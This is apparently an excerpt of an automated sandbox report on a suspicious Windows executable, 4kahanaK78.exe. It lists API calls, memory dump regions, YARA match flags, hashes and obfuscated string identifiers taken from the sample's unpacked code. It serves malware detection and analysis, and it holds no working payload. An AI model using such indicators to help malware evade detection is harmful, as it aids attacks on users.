                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                    • Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
                                    • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                    • Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                    • _free.LIBCMT ref: 004113B6
                                    • _free.LIBCMT ref: 004113EC
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                    • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                    • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                    • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CEA1C0
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CEA1D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: d8cf10429ad78adbbf649e9e716cdc821bb75004371922dd5f56d618f8819c6d
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: DD01D4323092119FA7342F77BC859772B56EB056B9730023AE914650E1FF1B7D126154
                                    APIs
                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                    • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                      • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                    • ___initconout.LIBCMT ref: 1000CD55
                                      • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
                                    • GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC
                                      • Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082
                                    • ___initconout.LIBCMT ref: 04B5B0BC
                                      • Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047
                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                    • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                      • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                    • ___initconout.LIBCMT ref: 0041AE55
                                      • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    APIs
                                    • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                    • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                    • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                    • String ID:
                                    • API String ID: 3269011525-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    APIs
                                    • _free.LIBCMT ref: 100067F1
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 10006804
                                    • _free.LIBCMT ref: 10006815
                                    • _free.LIBCMT ref: 10006826
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                    • _free.LIBCMT ref: 04B50CB6
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B50CC9
                                    • _free.LIBCMT ref: 04B50CDA
                                    • _free.LIBCMT ref: 04B50CEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                    • _free.LIBCMT ref: 00410A4F
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 00410A62
                                    • _free.LIBCMT ref: 00410A73
                                    • _free.LIBCMT ref: 00410A84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    APIs
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 3480331319-1018135373
                                    APIs
                                    • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    APIs
                                    • RtlEncodePointer.NTDLL(00000000), ref: 04B4B711
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    APIs
                                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE07BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: FEKN$NE]D
                                    • API String ID: 1385522511-517842756
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B41622
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: FEKN$NE]D
                                    • API String ID: 4132704954-517842756
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: FEKN$NE]D
                                    • API String ID: 2296764815-517842756
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE712E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 1385522511-3597986494
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6B6E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 1385522511-3597986494
                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction ID: 59acc23c6ae72a031bd4669f738b5fa74ef6f9e6a879dfa4ab37ba94fe350729
                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction Fuzzy Hash: D1014470F003089BCB20FFA9AD40A78B3B5E708314FC082B9D41857250EB3479419BDA
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47F95
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 4132704954-3597986494
                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B479D5
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 4132704954-3597986494
                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407D2E
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: CD^O$_DC[
                                    • API String ID: 2296764815-3597986494
                                    • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                    • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                    • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                    • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 0040776E
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: CD^O$_DC[
                                    • API String ID: 2296764815-3597986494
                                    • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                    • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                    • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                    • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6519
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DCDO$EDO*
                                    • API String ID: 1385522511-3480089779
                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction ID: 9a4274da65ab94f9fbd0f34c1431bece6a73b280ecacf18095417aab1c032893
                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction Fuzzy Hash: 8D01D6B0B023089FD720EFA5E88156CB7B1E704304FD04579CE0597350DB347A818B99
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DCDO$^]E*
                                    • API String ID: 1385522511-2708296792
                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
